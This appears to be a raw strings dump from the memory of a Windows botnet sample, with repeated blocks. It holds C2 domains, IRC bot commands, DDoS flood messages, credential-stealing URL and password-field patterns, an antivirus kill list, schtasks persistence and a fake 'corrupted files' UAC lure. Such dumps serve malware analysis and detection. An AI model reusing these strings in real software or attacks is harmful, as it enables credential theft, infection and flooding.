[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

URLDownloadToFileW

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

Secur32.dll

ShellExecuteA

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

WS2_32.dll

MSVCRT.dll

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

RegNotifyChangeKeyValue

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

7 767<7~7

8*808;8~8

{A5DCBF10-6530-11D2-901F-00C04FB951ED}

shlwapi.dll

crypt32.dll

wtsapi32.dll

samcli.dll

netutils.dll

userenv.dll

WindowsSecondaryDesktop

\charmap.exe

\Windows Media Player\wmprph.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

Aadvapi32.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

notepad.exe_376_rwx_008B0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

-%sMutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

m1xg.org

mxxtxxt.biz

meob.me

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\c1419a97

%System%\notepad.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe

7 767<7~7

8*808;8~8

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

notepad.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\notepad.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

notepad.exe_376_rwx_00D40000_00027000:

.text

`.rdata

@.data

.rsrc

@.reloc

PSSSSSSh

PSSVSSh

RPVSSh

PSSh(

PSSh#

PSSh'

PSSh&

PSSh*

9p.uV

notepad.exe_376_rwx_00D68000_0006D000:

Opera/9.00 (Windows NT 5.1; U; en)

Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)

Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)

Opera 9.4 (Windows NT 6.1; U; en)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)

Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)

SbieDll.dll

Software\Classes\CLSID\%s\X

Software\Classes\CLSID\%s\X\%s

0xX

SB:0xX

G:%s_0xX_%c:%s_v1$

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u

IEXPLORE.EXE

IE.HTTP

SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

IE.HTTPS

SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice

IE.AssocFile.HTM

HTTP\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s

Psapi.dll

%s\%s

Software\Adobe\Acrobat Reader\%s\Privileged

mscoree.dll

HARDWARE\DESCRIPTION\System\CentralProcessor\%u

SOFTWARE\Microsoft\Windows NT\CurrentVersion

nspr4.dll

nss3.dll

Urlmon.dll

URLDownloadToFileW

Netapi32.dll

76487-640-1457236-23837

76487-337-8429955-22614

76487-644-3177037-23510

76497-640-6308873-23835

55274-640-2673064-23950

76487-640-8834005-23195

76487-640-0716662-23535

76487-644-8648466-23106

00426-293-8170032-85146

76487-341-5883812-22420

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup

{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}

snxhk.dll

comctl32.dll

ZwSetValueKey

ZwDeleteValueKey

SOFTWARE\%s

update.microsoft.com

microsoft.com

windowsupdate.microsoft.com

JOIN

PRIVMSG

.rdata

cmd_option.%s

/c %s

cmd.exe

msvcrt.dll

--x-x-x-xx

Content-Type: multipart/form-data; boundary=x-x-x-xx

Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"

%s?action=up&g=%s

xul.dll

Content-Type: application/x-www-form-urlencoded

HTTP/1.1

?pid=%d

?page=%d

?id=%u

%s=%u&%s=%s

%s=%s&%s=%u

&%s=%s

&%s%u=

&%s%hu=

&%s=_%u

%d|%s|%s|%s

.info

httpget

GET /%s HTTP/1.1

Host: %s

Content-Length: %d

Accept: %s

Accept-Language: %s

Accept-Charset: %s

Accept-Encoding: %s

User-Agent: %s

Referer: %s

Connection: %s

http://

iexplore.exe

firefox.exe

tbb-firefox.exe

%s:%hu

windowsupdate

SSH2_MSG_KEXINIT

SSH2_MSG_DISCONNECT

SSH2_MSG_USERAUTH_SUCCESS

http://%s%s/image.php?id=%s

TaskDialogIndirect

http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535

ÐxX

ntdll.dll

kernel32.dll

secur32.dll

crypt32.dll

user32.dll

advapi32.dll

wininet.dll

shell32.dll

shlwapi.dll

ole32.dll

version.dll

sfc.dll

dnsapi.dll

ws2_32.dll

8"808]9|9

9%9 919<9

=(=/=6==={=

4 4?4^4}4

6o6g6r6w6

9 9$9(90949

.text

`.rdata

@.data

.rsrc

Invalid parameter passed to C runtime function.

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

GetProcessWindowStation

USER32.DLL

EnumDesktopWindows

SetWindowsHookExA

SetProcessWindowStation

SetWindowsHookW

UnregisterHotKey

ExitWindowsEx

GetAsyncKeyState

EnumWindows

GetKeyState

USER32.dll

SHELL32.dll

RegCloseKey

RegQueryInfoKeyA

RegOpenKeyExW

RegOpenKeyExA

RegCreateKeyW

RegCreateKeyA

ADVAPI32.dll

GDI32.dll

SHLWAPI.dll

GetProcessHeap

GetCPInfo

KERNEL32.dll

i%fOLK

>Z.DI

Q}.UbU

%S.Ny

J[ÿF

#Q.RP

[.ivH

|:v%X

ym.sg

X*.x.aVkyJ1

.Po7VE

M%Doz

,v.XS

Software\Classes\CLSID\%S

G:%S_0xX

chrome.exe

opera.exe

safari.exe

maxthon.exe

:Mozilla\Firefox\Profiles

cookies.sqlite

%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*

%s\winsxs\%s\comctl32.dll

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s

%s:*:Enabled

avcuf32.dll

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

prstrui.exe

Windows Defender

MpClient.dll

Windows Defender\MSASCui.exe

MpSvc.dll

msseces.exe

MsMpEng.exe

MSASCui.exe

MpAsDesc.dll

MsMpLics.dll

avgui.exe

avgidsagent.exe

avgwdsvc.exe

avgdiagex.exe

avgmfapx.exe

avgupd.exe

avgcfgex.exe

avgnt.exe

avguard.exe

avshadow.exe

avcenter.exe

update.dll

updaterc.dll

usrreq.exe

ccsvchst.exe

symerr.exe

NIS.exe

NAV.exe

navw32.exe

avastui.exe

AvastEmUpdate.exe

ashUpd.exe

WRSA.exe

zatray.exe

ForceField.exe

updating.dll

fshoster32.exe

fsaua.dll

PSUNMain.exe

PSUAService.exe

PSANHost.exe

PSUNScan.dll

epavjobs.exe

AVENGINE.exe

Upgrader.exe

adaware.exe

BullGuard.exe.manifest

BullGuardUpdate.exe

BullGuard.exe

BullGuardScanner.exe

BullGuardBhvScanner.exe

BullGuardUpdate2.exe

BgScan.exe

BgScanEngine.dll

.manifest

updater.exe

Backup\RSD\RSSetup\updater.exe

RsTray.exe

RavMonD.exe

RsMgrSvc.exe

rsmain.exe

RsScan.dll

RsTray.dll

mbamgui.exe

mbam.exe

pctsGui.exe

pctsAuxs.exe

pctsSvc.exe

Update.exe

UpdateHlpr.dll

Definitions\vcore.dll

sbamui.exe

SBAMTray.exe

updater_client_mod.dll

FProtTray.exe

FPWin.exe

scf.dat

ALUpdate.exe

update_tmp.exe

arcaclean.exe

BavUpdater.exe

rcfp.exe

CLPSLA.exe

op_mon.exe

niu.exe

K7TSUpdT.exe

sguardxup.exe

ccupdate.exe

caupdate.dll

a2guard.exe

a2start.exe

a2service.exe

AVKTray.exe

GDSC.exe

AVK.exe

GDFirewallTray.exe

Bka.exe

BLuPro.exe

BkavSystemServer.exe

BkavService.exe

LiveUpdate.dll

LiveConnect.dll

BaseFile\Bkav\LiveUpdate.dll

V3Lite.exe

ASDSvc.exe

autoup.exe

downloader.exe

%s.config

updatesrv.exe

updatemgr.dll

egui.exe

ekrn.exe

x86\ekrn.exe

uWinMgr.exe

coreServiceShell.exe

uiSeAgnt.exe

uiWatchDog.exe

plugins\plugUpdater.dll

UiFrmwrk\uiUpdateTray.exe

coreFrameworkHost.exe

mcagent.exe

McSvHost.exe

McUICnt.exe

McPvTray.exe

mcui_exe

mcpltui_exe

mcshell.exe

mcupdmgr.exe

mcupdate.exe

mcshield.exe

mcupdui.dll

McAPExe.exe

.config

Image File Execution Options\%s

SYSTEM\CurrentControlSet\services\%s

%c:\ntusbdriver.sys

%c:\*p.exe

%c:\%s

p.exe

%WinDir%\explorer.exe

/C start /d. %s&"%s"

%COMSPEC%

%WinDir%\system32\shell32.dll

%c:\%s.lnk

VisthAux.exe

explorer.exe

t.minecraft

Works! PID: %d, Name: %s

cmdvirth

%s%s\X

tcp://

svchost.exe

csrss.exe

lsass.exe

smss.exe

wscript.exe

cscript.exe

vbc.exe

rundll32.exe

regsvr32.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

winlogon.exe

services.exe

%s\x.lnk

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s

desktop.ini

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

wintrust.dll

chrome.dll

Applications\iexplore.exe\shell\open\command

%s_xx

x.zip

Navw32.exe

SysInspector.exe

avscan.exe

mfefire.exe

wuauclt.exe

WerFault.exe

lFileZilla\sitemanager.xml

port

Sites.dat

Quick.dat

%s\3\%s

%s\4\%s

spoolsv.exe

steam.exe

skype.exe

origin.exe

dwm.exe

tapi3.dll

/C copy "%s" "%s"

SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

Windows Update Service

"%s" /%s

Software\Microsoft\Windows\CurrentVersion\RunOnce

/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST

schtasks.exe

/DELETE /TN "Windows Update Check - 0xX" /F

\Windows\Explorer.exe

Low_X

%s.manifest

PendingFileRenameOperations

%s\X

Windows\CurrentVersion\Run

CurrentVersion\Windows

Windows NT\CurrentVersion\Image File Execution Options\%s

Windows has encountered a corrupted folder on your hard drive

Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.

Corrupted folder: %s

Corrupted file count: %d

%s

/c start "" "%s" /%s "%s"

shell32,ShellExec_RunDLL "%s" /%s "%s"

You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.

Windows 3.1 Update Service

%s:Zone.Identifier

%s\X.pif

KERNEL32.DLL

KERNELBASE.DLL

kernelbase.dll

1.2.3.4532

YandexDiskStarter.exe

Yandex.Disk

winlogon.exe_712_rwx_015B0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0\

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

-%sMutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

m1xg.org

mxxtxxt.biz

meob.me

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

